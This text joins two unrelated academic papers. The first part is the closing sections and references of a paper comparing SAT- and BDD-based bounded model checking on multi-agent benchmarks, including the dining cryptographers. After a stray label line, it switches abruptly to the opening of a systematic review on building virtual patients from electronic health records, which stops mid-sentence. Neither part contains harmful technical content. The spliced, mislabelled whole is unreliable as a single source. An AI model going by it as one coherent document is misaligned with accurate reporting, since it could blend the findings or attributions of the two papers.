\(\mathrm{G}(odd \wedge \lnot paid_1 \rightarrow \bigvee _{i=2}^n\mathrm{{K}}_1({paid}_i))\)—it expresses that always when the number of uttered differences is odd, and the first cryptographer has not paid for dinner, then he knows which cryptographer has. • \(\varphi _2\) = \(\mathrm{G}(\lnot paid_1 \rightarrow \mathrm{{K}}_1(\bigvee _{i=2}^n {paid}_i))\)—it states that it is always true that if the first cryptographer has not paid for dinner, then he knows that some other cryptographer has. • \(\varphi _3\) = \(\mathrm{G}(odd \rightarrow \mathrm{{C}}_{\{ 1,\ldots ,n \}}\lnot (\bigvee _{i=1}^n {paid}_i))\)—it states that always when the number of uttered differences is odd, than it is common knowledge of all the cryptographers that none of the cryptographers has paid for dinner. The size of the reachable state space of the system is \(3^n + (n + 1) \cdot 2^n \cdot (n + 1 + \sum _{k = 1}^{n} 2 \cdot 3^{n - k} \cdot k )\) for \(n{\,\geqslant \,}3\). The sizes of the counterexamples for the above formulae, and for all our BMC methods, as well as for MCK are shown in Table 5. 4.1 Performance evaluation The experimental results show that the SAT-based BMC with the IS semantics outperforms the SAT-based BMC with the IIS semantics in both the memory consumption and the execution time (as shown below in the line charts), but for the BDD-based BMC this is the other way around. The reason for this is that the SAT-based BMC with the IS semantics produces a significantly smaller set of clauses (as shown in Table 6), and the SAT solver is given this smaller set. Moreover, the produced set of clauses by the SAT-based BMC with the IS semantics is not only smaller, but also ’easier’ for the SAT solver, which further boosts the performance of the SAT-based BMC method with the IS semantics. The reason for the inferiority of the BDD-based BMC with the IS semantics in all of our results most likely follows from the fact that in the IS semantics, the BDD-based approach is faced with larger sets of successors in each iteration, compared to the IIS case. Table 6 Results for selected witnesses generated by the SAT-based BMC translations Formula Semantics \((\text {Max}^\triangledown \)) nr of components Length of the witness Nr of paths Nr of variables Nr of clauses Faulty train controller    \(\varphi _1\) IIS \(650^\triangledown \) 4 2 619982 1677373    \(\varphi _1\) IS 650 2 2 250690 618440    \(\varphi _1\) IS \(5500^\triangledown \) 2 2 2564618 6262036    \(\varphi _2\) IIS \(450^\triangledown \) 4 2 937878 2687061    \(\varphi _2\) IS 450 2 2 473350 1331220    \(\varphi _2\) IS \(1800^\triangledown \) 2 2 5623947 16452621 Faulty generic pipeline paradigm    \(\varphi _1\) IIS \(30^\triangledown \) 62 3 1024009 2869312    \(\varphi _1\) IS 30 62 3 844630 2257822    \(\varphi _1\) IS \(40^\triangledown \) 82 3 1476472 3919425    \(\varphi _2\) IIS \(35^\triangledown \) 74 1 517280 1449202    \(\varphi _2\) IS 35 72 1 390327 1044692    \(\varphi _2\) IS \(55^\triangledown \) 112 1 979275 2608936    \(\varphi _3\) IIS \(1200^\triangledown \) 6 1 1647007 4261015    \(\varphi _3\) IS 1200 6 1 2100292 5772169    \(\varphi _3\) IS \(1300^\triangledown \) 6 1 1838281 4771037    \(\varphi _4\) IIS \(1100^\triangledown \) 6 2 3886556 10690351    \(\varphi _4\) IS 1100 6 2 3033586 7868443    \(\varphi _4\) IS \(1200^\triangledown \) 6 2 3253362 8400171 Dining cryptographers    \(\varphi _1\) IIS \(6^\triangledown \) 25 6 551041 1639542    \(\varphi _1\) IS 6 9 6 122437 348178    \(\varphi _1\) IS \(16^\triangledown \) 19 16 2473680 7083283    \(\varphi _2\) IIS \(2300^\triangledown \) 0 2 508521 793923    \(\varphi _2\) IS 2300 0 2 80601 131343    \(\varphi _2\) IS \(2350^\triangledown \) 0 2 82351 134193    \(\varphi _3\) IIS \(5^\triangledown \) 21 22 2014710 6344695    \(\varphi _3\) IS 5 9 10 267628 805315    \(\varphi _3\) IS \(11^\triangledown \) 15 16 2167850 6635325 As one can see from the line charts for the FTC system, in the case of this benchmark over the IIS semantics, the BDD-based BMC performs much better in terms of the total time and the memory consumption for the formula \(\varphi _1\). More precisely, in the time limit set for the benchmarks, the BDD-based BMC is able to verify the formula \(\varphi _1\) for 2,500 trains, while the SAT-based BMC can handle 650 trains only. For \(\varphi _2\) the BDD-based BMC is still more efficient—it is able to verify 1,700 trains, whereas the SAT-based BMC verifies only 450 trains. However, in the case of the IS semantics the SAT-based BMC is superior to the BDD-based BMC for all the tested formulae. Namely, in the set time limit, the SAT-based BMC is able to verify the formula \(\varphi _1\) for 5,500 trains, while BDD-based BMC can handle 16 trains only. Similarly, in the case of the formula \(\varphi _2\) the SAT-based BMC is able to verify 1,800 trains, while BDD-based BMC computes the results for 16 trains only. As one can see from the line charts for the FGPP system, in the case of this benchmark over the IIS semantics the SAT-based BMC performs much better in terms of the total time and the memory consumption for the formulae \(\varphi _2,\,\varphi _3\), and \(\varphi _4\), but it is worse for the formula \(\varphi _1\). More precisely, in the set time limit, the SAT-based BMC is able to verify the formulae \(\varphi _2,\,\varphi _3\) and \(\varphi _4\), respectively, for 35, 1200, and 1100 nodes, while the BDD-based BMC has computes the results, respectively, for 30, 10, and 600 nodes only. In the case of the formula \(\varphi _1\) the BDD-based BMC is able to verify the formula for 40 nodes, whereas the SAT-based BMC can verify this formula for 30 nodes only. Here, the reason for a higher efficiency of the BDD-based BMC is the presence of the knowledge operator that causes the partitioning of the problem to several smaller ELTL verification problems, which are handled much better by the operations on BDDs. The reason for a higher efficiency of the SAT-based BMC for the formulae \(\varphi _2\), and \(\varphi _3\) is the translation which uses only one symbolic \(k\)-path, whereas a higher efficiency for the formula \(\varphi _4\) results from the constant length of the counterexample. As far as the FGPP system under the IS semantics is considered, the SAT-based BMC is superior to BDD-based BMC for all the tested formulae. Namely, in the set time limit, the SAT-based BMC is able to verify the formulae \(\varphi _1,\,\varphi _2,\,\varphi _3\) and \(\varphi _4\), respectively, for 40, 55, 1300 and 1200 nodes, while BDD-based BMC computes the results, respectively, for 6, 5, 9 and 13 nodes only. As one can see from the line charts for the DC system, in the case of this benchmark over the IIS semantics the BDD-based approach significantly outperforms the SAT-based BMC for the formulae \(\varphi _1\) and \(\varphi _3\), but for the formula \(\varphi _2\) this is the other way around. Namely, in the set time limit, the BDD-based BMC is able to verify the formulae \(\varphi _1\) and \(\varphi _3\) for 12 cryptographers, while SAT-based BMC computes the results, respectively, for 6 and 5 cryptographers only. In the case of formula \(\varphi _2\) SAT-based BMC computes the results for 2,300 cryptographers, whereas BDD-based BMC for 15 only. For the formulae \(\varphi _1\) and \(\varphi _3\) the reason of a higher efficiency of the BDD-based BMC is that the SAT-based BMC deals with a huge number of symbolic \(k\)-paths. In the case of \(\varphi _1\) this number results from the fact that \(\varphi _1\) contains the disjunction of the knowledge operators, whereas in the case of \(\varphi _3\) the huge number of symbolic \(k\)-paths follows from the fact that \(\varphi _3\) contains the common knowledge operator. A noticeable superiority of the SAT-based BMC for \(\varphi _2\) follows from the following two facts: (1) the length of the SAT counterexample is constant and very small, and (2) a small number of symbolic paths in the SAT counterexample (only 2 symbolic \(k\)-paths). As fas as the DC system under the IS semantics is considered, the SAT-based BMC is superior to BDD-based BMC for all the tested formulae. Namely, in the set time limit, the SAT-based BMC is able to verify the formulae \(\varphi _1,\,\varphi _2\), and \(\varphi _3\), respectively, for 16, 2,350 and 11 cryptographers, while BDD-based BMC computes the results, respectively, for 4, 7 and 4 cryptographers only. For the IIS semantics, the reordering of the BDD variables does not cause any improvement of the performance in the case of the benchmarks FTC and FGPP, but for the benchmark DC it reduces the memory consumption. This means that the fixed interleaving order we used can often be considered optimal, but the loss in the verification time to reorder the variables, in favour of reducing the memory consumption, is also not significant and is often worth the tradeoff. Therefore, in the results for IIS we include only the BDD-based BMC variant using automatic reordering of the variables. In the case of the IS semantics the fixed interleaving order appears to be more efficient than the used reordering method. For this reason, we include only the results for the fixed interleaving order. From our analyses we can conclude that the BDD-based BMC method is more efficient when verifying systems with the IIS semantics, whereas the SAT-based BMC method is superior when used with systems with the IS semantics. Moreover, in most cases, the BDD-based BMC spends a considerable amount of time on encoding the system, whereas the SAT-based BMC on verifying the formula. Therefore, the BDD-based BMC may provide additional time gains when verifying multiple specifications of the same system. 4.1.1 Comparison with MCK While MCK enables verification of LTLK properties and implements the semantics of IS, it differs from our approaches in the way in which the systems are specified. We carefully inspected how the systems are represented in MCK and what a state is composed of, using the feature of printing out the state space for explicit-state reachability analysis, and noticed that the differences with our modelling are not merely syntactic. The state space is constructed by MCK in a significantly different way, for example a program counter is added for each agent, and channels are the standard way of inter-process communication. Taking the above facts into account, we have found it not to be justified to get the numbers of states exactly equal to the ones reported by our tools. Reaching this aim could be not possible at all or would require to specify examples for MCK in an unnatural way, possibly penalising the performance. Instead, we have done our best to model the benchmarks in MCK in a way as close as possible to our approach, but modelling similarly to the ones distributed with MCK and available at the MCK web page. To this aim we have used the observable semantics while dealing with the knowledge of agents as opposed to the perfect recall semantics, which is also available in MCK. Next, we have modelled concurrent executions in the analysed systems by means of the message-passing communication instead of the hand-shake communication. The reason is that in the message-passing communication model the protocol specification for an agent allows to have a communication channel as an argument, which enables establishing a two-point communication. Based on the knowledge available to the user, a corresponding construction for the hand-shaking approach is unsupported by MCK as an agent identifier cannot be used as an argument in the protocol definition. The hand-shaking communication is used in MCK example benchmarks and in the documentation for unscalable systems only. In the Dining Cryptographers code available at the MCK web page, the message-passing communication approach is used. Therefore, forcing the hand-shaking communication model in MCK for our benchmarks would be very unnatural and clearly cause a performance penalty. Further, we have ensured that for each considered benchmark, the counterexamples found by the tools are of similar size, i.e., either they are constant or their complexity is the same with respect to the number of the processes. Of course, we restrict our comparisons to the IS case. While we possibly could force the IIS semantics in the IS systems, this would be inefficient. In the comparison of MCK with our methods, the lengths of counterexamples behave similarly, i.e. either unfold to the depth proportional to the benchmark parameter or have a fixed number of steps (with the exception of the DC model, what is described below), thus minimising the factor played by different communication schemes. These lengths are in general not equal, and do not scale in the exactly the same way, what can be seen especially for formulae \(\varphi _1\) and \(\varphi _2\) for FGPP. This may have two reasons: the way in which the model description is translated into the model itself, and the encoding for checking the requested properties. We can say little about the latter as no detailed counterexamples are produced by the tool. Concerning the former, we figured out by looking into the structure of the model reported for simple reachability properties that the bigger lengths are caused by a different approach to specifying systems. For example, a synchronous change of state for several components is performed in one step in our approaches, as variable values are represented by interpreted system states. On the contrary, in MCK communications via channels as well as testing and assigning of variables result in more steps. Additionally, sending and receiving messages combined with reading and assigning variables can possibly result in several values of a program counter. The comparison shows that for FGPP and FTC our BDD-BMC and SAT-BMC are superior to MCK for all the tested formulae (sometimes by several orders of magnitude). MCK consumes all the available memory even when the formulae are surprisingly small (approx. \(10^6\) clauses and \(10^5\) variables) compared to those successfully tested in our SAT-based BMC experiments (more than \(10^8\) clauses and variables in some cases). An additional comment is required for the DC benchmark, where for the formulae \(\varphi _1\) and \(\varphi _3\), there are differences in the length of counterexamples: constant for MCK and linear for our methods. This can be traced back to the presence of the counter. In our modelling, the counter works sequentially. It introduces some limited concurrency as its actions can interleave with the preceding actions of cryptographers (to the limited degree, because the order of counting cryptographers is fixed). In MCK, there is an XOR operation available, computed in a single step. We have decided not to add a sequential counter in this case, finding it unnatural. However, it should be noted that the models are not the same for MCK and our tools for the DC benchmark, what influences the efficiency when they are explored to the full length (the diamater of the model). The general conclusion is that while our methods can be found to be much more efficient, MCK offers a much richer specification language, which in certain situations (see DC) results in a more efficient modelling. 5 Final remarks We have proposed, implemented, and experimentally evaluated SAT- and BDD-based bounded model checking approaches for ELTLK interpreted over both the standard interpreted systems and the interleaved interpreted systems. The experimental results show that the approaches are complementary, and that the BDD-based BMC approach appears to be superior for the IIS semantics, while the SAT-based approach appears to be superior for the IS semantics. This is a novel and interesting result, which shows that the choice of the semantics should depend on the symbolic method applied. We have also done our best to provide a comparison of our BMC methods with the MCK tool. This comparison shows that the efficiency of the verification approach is strongly influenced by the semantics used to model MAS, i.e., whether IS or IIS are applied. In the future we are going to extend the presented algorithms to handle also the \(\mathrm{ECTL}^{*}\mathrm{K}\) properties. Footnotes 1. 1. We would like to stress that we have used the RBC structure in our BMC implementations since 2003 [50], although we have not stated this explicitly in our previous works. 2. 2. Let \(\alpha \) be a formula. Its clausal form is a set of clauses which is satisfiable if and only if \(\alpha \) is satisfiable. 3. 3. Notes Acknowledgments Partly supported by National Science Center under the Grant No. 2011/01/B/ST6/05317 and 2011/01/B/ST6/01477. Artur Mȩski acknowledges the support of the EU, European Social Fund. Project PO KL “Information technologies: Research and their interdisciplinary applications” (UDA-POKL.04.01.01-00-051/10-00). References 1. 1. Abdulla, P. A., Bjesse, P., & Eén, N. (2000). Symbolic reachability analysis based on SAT-solvers. In Proceedings of the 6th International Conference on Tools and Algorithms for the Construction and Analysis of Systems (TACAS’00). Lecture Notes in Computer Science, (Vol. 1785, pp. 411–425). Berlin: Springer.Google Scholar 2. 2. Biere, A. (2008). PicoSAT essentials. Journal on Satisfiability Boolean Modeling and Computation (JSAT), 4, 75–97.MATHGoogle Scholar 3. 3. Biere, A., Cimatti, A., Clarke, E., Fujita, M., & Zhu, Y. (1999). Symbolic model checking using SAT procedures instead of BDDs. In Proceedings of the ACM/IEEE Design Automation Conference (DAC’99) (pp. 317–320).Google Scholar 4. 4. A. Biere, A. Cimatti, E. Clarke, & Y. Zhu. (1999). Symbolic model checking without BDDs. In Proceedings of the 5th International Conference on Tools and Algorithms for the Construction and Analysis of Systems (TACAS’99). Lecture Notes in Computer Science (Vol. 1579, pp. 193–207). Berlin: Springer.Google Scholar 5. 5. Biere, A., Heljanko, K., Junttila, T., Latvala, T., & Schuppan, V. (2006). Linear encodings of bounded LTL model checking. Logical Methods in Computer Science, 2(5:5), 1–64.MathSciNetGoogle Scholar 6. 6. R. Bordini, M. Fisher, C. Pardavila, W. Visser, & M. Wooldridge. (2003). Model checking multi-agent programs with CASP. In Proceedings of the 15th International Conference on Computer Aided Verification (CAV’03). Lecture Notes in Computer Science (Vol. 2725, pp. 110–113). Springer.Google Scholar 7. 7. Bordini, R. H., Fisher, M., Wooldridge, M., & Visser, W. (2009). Property-based slicing for agent verification. Journal of Logic and Computation, 19(6), 1385–1425.CrossRefMATHMathSciNetGoogle Scholar 8. 8. N. Bulling & W. Jamroga. (2010). Model checking agents with memory is harder than it seemed. In Proceedings of the 9th International Conference on Autonomous Agents and Multiagent Systems (AAMAS’10) (pp. 633–640). International Foundation for Autonomous Agents and Multiagent Systems.Google Scholar 9. 9. Cabodi, G., Camurati, P., & Quer, S. (2002). Can BDD compete with SAT solvers on bounded model checking?. In Proceedings of the 39th Design Automation Conference (DAC’02) (pp. 117–122).Google Scholar 10. 10. Chaum, D. (1988). The dining cryptographers problem: Unconditional sender and recipient untraceability. Journal of Cryptology, 1(1), 65–75.CrossRefMATHMathSciNetGoogle Scholar 11. 11. Clarke, E., Grumberg, O., & Hamaguchi, K. (1994). Another look at LTL model checking. In Proceedings of the 6th International Conference on Computer Aided Verification (CAV’94). Lecture Notes in Computer Science (Vol. 818, pp. 415–427). Berlin: Springer.Google Scholar 12. 12. Clarke, E., Grumberg, O., & Peled, D. (1999). Model checking. Cambridge: MIT Press.Google Scholar 13. 13. Copty, F., Fix, L., Fraer, R.., Giunchiglia, E., Kamhi, G.., Tacchella, A., & Vardi, M. (2001). Benefits of bounded model checking at an industrial setting. In Proceedings of the 13th International Conference on Computer Aided Verification (CAV’01). Lecture Notes in Computer Science (Vol. 2102, pp. 436–453). Berlin: Springer.Google Scholar 14. 14. Dennis, L. A., Fisher, M., Webster, M. P., & Bordini, R. H. (2012). Model checking agent programming languages. Automated Software Engineering, 19(1), 5–63.CrossRefGoogle Scholar 15. 15. Etessami, K., & Holzmann, G. J. (2000). Optimizing büchi automata. In Proceedings of the 11th International Conference on Concurrency Theory (CONCUR’00). Lecture Notes in Computer Science (Vol. 1877, pp. 153–167). Berlin: Springer.Google Scholar 16. 16. Fagin, R., Halpern, J. Y., Moses, Y., & Vardi, M. (1995). Reasoning about Knowledge. Cambridge: MIT Press.MATHGoogle Scholar 17. 17. Gammie, P., & Meyden, R. (2004). MCK: Model checking the logic of knowledge. In Proceedings of the 16th International Conference on Computer Aided Verification (CAV’04). Lecture Notes in Computer Science (Vol. 3114, pp. 479–483). Berlin: Springer.Google Scholar 18. 18. Gastin, P., & Oddoux, D. (2001). Fast LTL to Büchi automata translation. In Proceedings of the 13th International Conference on Computer Aided Verification (CAV’01). Lecture Notes in Computer Science (Vol. 2102, pp. 53–65). Berlin: Springer.Google Scholar 19. 19. Gerth, R., Peled, D., Vardi, M., & Wolper, P. (1995). Simple on-the-fly automatic verification of linear temporal logic. In Proceedings of IFIP/WG6.1 Symposium. Protocol Specification, Testing and Verification (PSTV’95) (pp. 3–18). Chapman & Hall.Google Scholar 20. 20. Halpern, J., & Vardi, M. (1991). Model checking vs. theorem proving: A manifesto. In Proceedings of the 2nd International Conference on Principles of Knowledge Representation and Reasoning (KR’91) (pp. 325–334). Cambridge: Morgan Kaufmann.Google Scholar 21. 21. Hoek, W., & Wooldridge, M. (2003). Cooperation, knowledge, and time: Alternating-time temporal epistemic logic and its applications. Studia Logica, 75(1), 125–157.CrossRefMATHMathSciNetGoogle Scholar 22. 22. Hoek, W. V., & Wooldridge, M. (2002). Model checking knowledge and time. In Proceedings of the 9th International SPIN Workshop on Model Checking of Software (SPIN’2002). Lecture Notes in Computer Science (Vol. 2318, pp. 95–111). Berlin: Springer.Google Scholar 23. 23. Huang, X., Luo, C., & van der Meyden, R. (2011). Improved bounded model checking for a fair branching-time temporal epistemic logic. In Proceedings of the 6th Workshop on Model Checking and Artificial Intelligence (MoChArt’2010), LNAI (Vol. 6572, pp. 95–111). Berlin: Springer.Google Scholar 24. 24. Jamroga, W., & Dix, J. (2008). Model checking abilities of agents: A closer look. Theory of Computing Systems, 42(3), 366–410.CrossRefMATHMathSciNetGoogle Scholar 25. 25. Jamroga, W., & Penczek, W. (2012). Specification and verification of multi-agent systems. In Lectures on Logic and Computation (ESSLLI’2010, ESSLLI’2011). Lecture Notes in Computer Science (Vol. 7388, pp. 210–263). Berlin: Springer.Google Scholar 26. 26. Jones, A. V., & Lomuscio, A. (2010). Distributed BDD-based BMC for the verification of multi-agent systems. In Proceedings of the 9th International Conference on Autonomous Agents and Multi-Agent systems (AAMAS’2010) (pp. 675–682). Toronto: IFAAMAS Press.Google Scholar 27. 27. Kacprzak, M., Lomuscio, A., Niewiadomski, A., Penczek, W., Raimondi, F., & Szreter, M. (2006). Comparing BDD and SAT based techniques for model checking Chaum’s dining cryptographers protocol. Fundamenta Informaticae, 72(1–2), 215–234.MATHMathSciNetGoogle Scholar 28. 28. Kacprzak, M., Nabiałek, W., Niewiadomski, A., Penczek, W., Półrola, A., Szreter, M., et al. (2008). Verics 2007—a model checker for knowledge and real-time. Fundamenta Informaticae, 85(1–4), 313–328.MATHMathSciNetGoogle Scholar 29. 29. Lomuscio, A., Lasica, T., & Penczek, W. (2003). Bounded model checking for interpreted systems: Preliminary experimental results. In Proceedings of the 2nd NASA Workshop on Formal Approaches to Agent-Based Systems (FAABS’02), LNAI (Vol. 2699, pp. 115–125). Berlin: Springer.Google Scholar 30. 30. Lomuscio, A., Pecheur, C., & Raimondi, F. (2007). Automatic verification of knowledge and time with nusmv. In Proceedings of International Conference on Artificial Intelligence (IJCAI’07) ( pp. 1384–1389).Google Scholar 31. 31. Lomuscio, A., Penczek, W., & Qu, H. (2010). Partial order reduction for model checking interleaved multi-agent systems. In Proceedings of the 9th International Conference on Autonomous Agents and Multi-Agent systems (AAMAS’2010) (pp. 659–666). Toronto: FAAMAS Press.Google Scholar 32. 32. Lomuscio, A., Penczek, W., & Woźna, B. (2007). Bounded model checking for knowledge and real time. Artificial Intelligence, 171, 1011–1038.CrossRefMATHMathSciNetGoogle Scholar 33. 33. Mȩski, A., Penczek, W., & Szreter, M. (2011). Bounded model checking linear time and knowledge using decision diagrams. In Proceedings of the International Workshop on Concurrency, Specification and Programming (CS &P’11) (pp. 363–375).Google Scholar 34. 34. Mȩski, A., Penczek, W., & Szreter, M. (2012). BDD-based bounded model checking for LTLK over two variants of interpreted systems. In Proceedings of 5th International Workshop on Logics, Agents, and Mobility (pp. 35–50).Google Scholar 35. 35. Mȩski, A., Penczek, W., Szreter, M., Woźna-Szcześniak, B., & Zbrzezny, A. (2012). Bounded model checking for knowledge and linear time. In Proceedings of the 11th International Conference on Autonomous Agents and Multi-Agent systems (AAMAS’2012) (pp. 1447–1448). Toronto: IFAAMAS Press.Google Scholar 36. 36. Mȩski, A., Penczek, W., Szreter, M., Woźna-Szcześniak, B., & Zbrzezny, A. (2012). Two approaches to bounded model checking for linear time logic with knowledge. In The Proceedings of the 6th KES International Conference on Agent and Multi-Agent Systems, Technologies and Applications (KES-AMSTA’2012). Lecture Notes in Computer Science (Vol. 7327, pp. 514–523). Berlin: Springer.Google Scholar 37. 37. Mȩski, A., Woźna-Szcześniak, B., Zbrzezny, A. M., & Zbrzezny, A. (2013). Two approaches to bounded model checking for a soft real-time epistemic computation tree logic. In Proceedings of the 10th International Symposium on Distributed Computing and Artificial Intelligence (DCAI’2013), Advances in Intelligent and Soft-Computing, (Vol. 217, pp. 483–492). Berlin: Springer.Google Scholar 38. 38. Meyden, R., & Shilov, N. V. (1999). Model checking knowledge and time in systems with perfect recall. In Proceedings of the 19th Conference on Foundations of Software Technology and Theoretical Computer Science (FSTTCS’99). Lecture Notes in Computer Science (Vol. 1738, pp. 432–445). Berlin: Springer.Google Scholar 39. 39. Meyden, R., & Su, K. (2004). Symbolic model checking the knowledge of the dining cryptographers. In Proceedings of the 17th IEEE Computer Security Foundations Workshop (CSFW-17) (pp. 280–291). IEEE Computer Society.Google Scholar 40. 40. Peled D. (1993). All from one, one for all: On model checking using representatives. in Proceedings of the 5th International Conference on Computer Aided Verification (CAV’93). Lecture Notes in Computer Science (Vol. 697, pp. 409–423). Berlin: Springer.Google Scholar 41. 41. Penczek, W., & Lomuscio, A. (2003). Verifying epistemic properties of multi-agent systems via bounded model checking. Fundamenta Informaticae, 55(2), 167–185.MATHMathSciNetGoogle Scholar 42. 42. Penczek, W., Woźna-Szcześniak, B., & Zbrzezny, A. (2012). Towards SAT-based BMC for LTLK over interleaved interpreted systems. Fundamenta Informaticae, 119(3–4), 373–392.MATHMathSciNetGoogle Scholar 43. 43. Raimondi, F., & Lomuscio, A. (2007). Automatic verification of multi-agent systems by model checking via OBDDs. Journal of Applied Logic, 5(2), 235–251.CrossRefMATHMathSciNetGoogle Scholar 44. 44. Somenzi, F. CUDD: CU decision diagram package—release 2.3.1. http://vlsi.colorado.edu/~fabio/CUDD/cuddIntro.html. 45. 45. Somenzi, F., Bloem, R. (2000). Efficient Büchi automata from LTL formulae. In Proceedings of the 12th International Conference on Computer Aided Verification (CAV’00). Lecture Notes in Computer Science (Vol. 1855, pp. 248–263). Berlin: Springer.Google Scholar 46. 46. Su, K., Sattar, A., & Luo, X. (2007). Model checking temporal logics of knowledge via OBDDs. The Computer Journal, 50(4), 403–420.CrossRefGoogle Scholar 47. 47. Troquard, N., Hoek, W. V. D., & Wooldridge, M. (2009). Model checking strategic equilibria. In Proceedings of the 5th International Workshop on Model Checking and Artificial Intelligence (MOCHART’2008), LNAI (Vol. 5348, pp. 166–188). Berlin: Springer.Google Scholar 48. 48. Wooldridge, M. (2002). An introduction to multiagent systems. Chichester: Wiley.Google Scholar 49. 49. Woźna, B., Lomuscio, A., & Penczek, W. (2005). Bounded model checking for deontic interpreted systems. In Proceedings of the 2nd International Workshop on Logic and Communication in Multi-Agent Systems (LCMAS’04), ENTCS (Vol. 126, pp. 93–114). Amsterdam: Elsevier.Google Scholar 50. 50. Woźna, B., Zbrzezny, A., & Penczek, W. (2003). Checking reachability properties for timed automata via SAT. Fundamenta Informaticae, 55(2), 223–241.MATHMathSciNetGoogle Scholar 51. 51. Woźna-Szcześniak, B., & Zbrzezny, A. (2012). Sat-based bounded model checking for deontic interleaved interpreted systems. In The Proceedings of the 6th KES International Conference on Agent and Multi-Agent Systems, Technologies and Applications (KES-AMSTA’2012). Lecture Notes in Computer Science (Vol. 7327, pp. 494–503). Berlin: Springer.Google Scholar 52. 52. Woźna-Szcześniak, B., & Zbrzezny, A. (2013). SAT-based bmc for deontic metric temporal logic and deontic interleaved interpreted systems. In Declarative Agent Languages and Technologies X. The 10th International Workshop (DALT’2012), LNAI (Vol. 7784, pp. 70–189). Berlin: Springer.Google Scholar 53. 53. Woźna-Szcześniak, B., Zbrzezny, A. M., & Zbrzezny, A. (2011). The BMC method for the existential part of RTCTLK and interleaved interpreted systems. In In Proceedings of the 15th Portuguese Conference on Artificial Intelligence (EPIA’2011), LNAI (Vol. 7026, pp. 551–565). Berlin: Springer.Google Scholar 54. 54. Zbrzezny, A. (2008). Improving the translation from ECTL to SAT. Fundamenta Informaticae, 85(1–4), 513–531.MATHMathSciNetGoogle Scholar 55. 55. Zbrzezny, A. (2012). A new translation from \(\text{ ECTL }^{*}\) to SAT. Fundamenta Informaticae, 120(3–4), 377–397.Google Scholar Copyright information © The Author(s) 2013 Open AccessThis article is distributed under the terms of the Creative Commons Attribution License which permits any use, distribution, and reproduction in any medium, provided the original author(s) and the source are credited. Authors and Affiliations • Artur Mȩski • 1 • 4 • Wojciech Penczek • 1 • 3 • Maciej Szreter • 1 • Bożena Woźna-Szcześniak • 2 • Andrzej Zbrzezny • 2 1. 1.Institute of Computer Science, PASWarszawaPoland 2. 2.Jan Długosz University, IMCSCzestochowaPoland 3. 3.University of Natural Sciences and Humanities, IISiedlcePoland 4. 4.University of Łódź, FMCSLodzPoland Personalised recommendations
__label__pos
0.999615
Skip to main content On the usage of health records for the design of virtual patients: a systematic review Abstract Background The process of creating and designing Virtual Patients for teaching students of medicine is an expensive and time-consuming task. In order to explore potential methods of mitigating these costs, our group began exploring the possibility of creating Virtual Patients based on electronic health records. This review assesses the usage of electronic health records in the creation of interactive Virtual Patients for teaching clinical decision-making. Methods The PubMed database was accessed programmatically to find papers relating to Virtual Patients. The returned citations were classified and the relevant full text articles were reviewed to find Virtual Patient systems that used electronic health records to create learning modalities. Results A total of n = 362 citations were found on PubMed and subsequently classified, of which n = 28 full-text articles were reviewed. Few articles used unformatted electronic health records other than patient CT or MRI scans. The use of patient data, extracted from electronic health records or otherwise, is widespread. The use of unformatted electronic health records in their raw form is less frequent. Patient data use is broad and spans several areas, such as teaching, training, 3D visualisation, and assessment. Conclusions Virtual Patients that are based on real patient data are widespread, yet the use of unformatted electronic health records, abundant in hospital information systems, is reported less often. The majority of teaching systems use reformatted patient data gathered from electronic health records, and do not use these electronic health records directly. Furthermore, many systems were found that used patient data in the form of CT or MRI scans. Much potential research exists regarding the use of unformatted electronic health records for the creation of Virtual Patients. Peer Review reports Background Much research has shown that Virtual Patients are a credible and effective form of teaching, and they have been shown to improve knowledge retention, student participation, and other factors [1, 2]. However, they are also expensive and time consuming to produce, resulting in lower adoption rates than might be expected [3]. Reducing the costs of producing Virtual Patients, while still maintaining their efficacy as a teaching tool, is paramount to their successful acceptance and adoption, especially for institutions in less developed countries were cost issues are more inhibitive. In an attempt to reduce the costs of producing Virtual Patients, our group began experimenting with the notion of developing a tablet-based application for the Apple iPad that would base Virtual Patients on real, unformatted, annotated electronic health records [4]. In order to gain an understanding of previous work carried out in this field, a literature review was conducted to investigate Virtual Patients and the role of the electronic health record in their construction. More specifically, our group wished to ascertain whether previous work had concentrated on producing learning material using electronic health records gathered from hospital information systems. Further, we wished to learn if there has been any precedent in using annotated patient records for the purposes of teaching. Last, because interoperability and collaboration are paramount to reducing costs, we wished to investigate if any file formats for the exchange of Virtual Patients have been suggested or proposed by any research groups, or if any existing standards, such as SCORM (Sharable Content Object Reference Model) are in widespread use. The use of standards is important for the ability to allow for learning modules to be shared across medical centres worldwide. Before proceeding, it is important to define the terminology used throughout this paper. This paper discusses unformatted electronic patient records which we describe as patient records which have been retrieved from a hospital information system in their raw form. These could be lab reports, medical examination reports, X-Rays, electrocardiograms (ECGs), and so on. Many Virtual Patients are based on patient data, yet often they do not use electronic health records in their raw form; rather, data are extracted from these records and reformatted for use in a Virtual Patient user interface. By annotated patient records, we describe any electronic patient records which have been subsequently tagged with meta-data or some descriptive text. For example, a patient record may contain an acronym that is not widely known, and such a patient record may be annotated with meta-information describing the meaning of the acronym in order to aid the learner. Scanned hand-written documents which have been annotated with an electronic version of the document’s text would also be considered an annotated patient record. Last, it is important to define what is meant by the term “Virtual Patient” itself. According to the European Commission co-funded Electronic Virtual Patients (eViP) project, a Virtual Patient is “an interactive computer simulation of real-life clinical scenarios for the purpose of medical training, education or assessment”. This definition covers all electronic Virtual Patients, however for the purposes of this review this definition has been expanded to include other forms of virtual patient, including hardware simulators, mannequins, and videos. This was done in order to remain as flexible as possible when deciding on which abstracts should be accepted for the review. Methods The PubMed database was queried programmatically using the E-utilities API made available by the National Center for Biotechnology Information (NCBI). A small Java program was developed to access PubMed using the search term “Virtual Patient” OR “Virtual Patients”, resulting in n = 362 returned results. A standard free-text query was performed as no MeSH term for Virtual Patient exists. The results, returned by the API in XML format, were subsequently stored in an OpenOffice.org database for reviewing. Of the fields returned by the E-utilities API, the Authors, PubMed ID, Title, Affiliations, Year, Month, and Abstract fields were stored in the database while the rest were discarded. The citations were last extracted on the 10th of January 2013. The Java application was also designed to export all citations as an HTML file which includes hyperlinks to each PubMed abstract (see Additional file 1). The literature review was performed in four steps. The initial step was to review all abstracts that were retrieved from PubMed, discarding those that were unsuitable. The second phase was to categorise all the suitable abstracts and to tag each abstract with various attributes which are described below. The third phase involved gathering information regarding the categorisation of each of the abstracts by running SQL queries on the tagged citations stored in the OpenOffice.org database. The fourth and final phase was to review the full text articles that described using Virtual Patients based on patient data or electronic health records. A flowchart of the abstract selection procedure can be seen in Figure 1. Figure 1 figure 1 Abstract dlowchart. The procedure followed during the abstract and manuscript reviewing process. Phase 1 In phase 1, each of the 362 citations returned by the NCBI web service was reviewed for suitability. In this phase, only those citations where no abstract 